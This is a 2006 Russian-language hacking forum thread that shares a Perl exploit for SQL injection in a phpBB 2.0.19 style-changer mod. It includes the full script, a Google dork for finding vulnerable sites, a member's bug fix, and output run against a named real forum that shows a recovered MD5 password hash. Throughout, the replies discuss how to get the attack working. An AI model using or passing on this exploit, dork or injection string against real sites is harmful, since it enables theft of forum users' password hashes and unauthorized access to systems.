Форумы phpBB 2.0.19 Exploit

Discussion in 'Уязвимости CMS/форумов' started by m0nzt3r, 6 Feb 2006.

  1. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    Окуеть уже до 19 дошли...
    собственно вот линк _http://www.milw0rm.com/id.php?id=1469
    а вот код
    Code:
    #!/usr/bin/perl
    #########################################################
    #		 _______ _______ ______ 		#
    #		 |______ |______ |     \		#
    #		 ______| |______ |_____/		#
    #		                        		#
    #phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT	#
    #Created By SkOd                                        #
    #SED security Team                                      #
    #http://www.sed-team.be                                 #
    #[email protected]                                      #
    #ISRAEL                                                 #
    #########################################################
    #google:
    #"Powered by phpBB" inurl:"index.php?s" OR inurl:"index.php?style"
    #########################################################
    use IO::Socket;
    if (@ARGV < 3){
    print q{
    ############################################################
    #   phpBB Style Changer\Viewer MOD SQL injection Exploit   #
    #		Tested on phpBB 2.0.19			   #
    #	    created By SkOd. SED Security Team             #
    ############################################################
    	bbstyle.pl [HOST] [PATH] [Target id]
    	 bbstyle.pl www.host.com /phpbb2/ 2
    ############################################################
    };
    exit;
    }
    $serv = $ARGV[0];
    $dir = $ARGV[1];
    $id = $ARGV[2];
    print "[+]Make Connection\n";
    $serv =~ s/(http:\/\/)//eg;
    $path = $dir.'index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id='.$id.'/*';
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
    print $socket "GET $path HTTP/1.1\n";
    print $socket "Host: $serv\n";
    print $socket "Accept: */*\n";
    print $socket "Connection: close\n\n";
    print "[+]Connected\n";
    while ($hash = <$socket>){
    $hash =~ m/open(.*?)template/ && print "[+]User id: $id\n[+]Md5 Hash: $1\n";
    }
    
    # milw0rm.com [2006-02-05]
    
    
     
    6 people like this.
  2. Troxy

    Troxy New Member

    Joined:
    26 Jan 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    shto ta nefuric4it kak nado


    C:\>c:\perl\bin\perl.exe c:\bb2.pl http://******* /forums/ 2
    [+]Make Connection
    [+]Connected


    i sjo poslje etovo
     
  3. Desr0w

    Desr0w Banned

    Joined:
    1 Feb 2006
    Messages:
    370
    Likes Received:
    166
    Reputations:
    45
    у кого пахало?Я около 15 пробовал не пашет пока
     
  4. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
  5. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    да вручную всё прекрасно работает!)))
     
  6. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    Работает на все 100% =)
     
  7. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    У кого не работает, вы из форума копировали сплойт?
     
  8. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    да)))
     
  9. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    Ошибка В Exploit-е есть =)) Ну что парни кто не любит в Ручную ищите Ошибку в Скрипте =))
     
  10. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Всё работает на ура, всё нормально
     
    _________________________
  11. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    о спасибо лимпопо, действительно ошибка =)))
    вот быстренько исправил, у кого руки не из задницы поймут

    while ($hash = <$socket>){
    $hash =~ m/open(.*?)template/ ;
    $pass=$1;
    }
    print "[+]User id: $id\n[+]Md5 Hash: $pass\n";
     
  12. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    Рабочая верcия Выглядит так!
    perl phpbb19.pl http://www.extremepixels.net /phpbb/
    [+]Make Connection
    [+]Connected
    [+]User id: 2
    [+]Md5 Hash: 12d187897ee09aa0900af90c29f0936c


    Вуаля =))
     
  13. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    Вручную юзается хорошо. Но не везде работает=(
    На многих форумах ничего не происходит=(
     
  14. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    Значит пропатчины или Другая версия phpbb
     
  15. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    Видимо...
    Но тестил на локал хосте. Версия 100% 2.0.19.
    Ничего не происходит. Никакие патчи вроде не ставлены. Версия оригинальная.
    На приведённых в топике форумах всё работает.
    Хм... Странновато малость. Или я ламмерю?
     
  16. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    ошибка же не в форуме а в моде
     
  17. Jonathan Allen

    Joined:
    21 Mar 2005
    Messages:
    62
    Likes Received:
    6
    Reputations:
    2
    Люди, скажите пожалуйста, как его запустить на перле? У меня установлен ActivePerl 5.8.3
     
  18. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    имхо, юзайте вручную, запарили ныть уже)))
     
    1 person likes this.
  19. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    zaivi d cmd -> i napishi perl lalala.pl
     
  20. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Вручную проще! Работает классно.
    А он тока на 19 работает?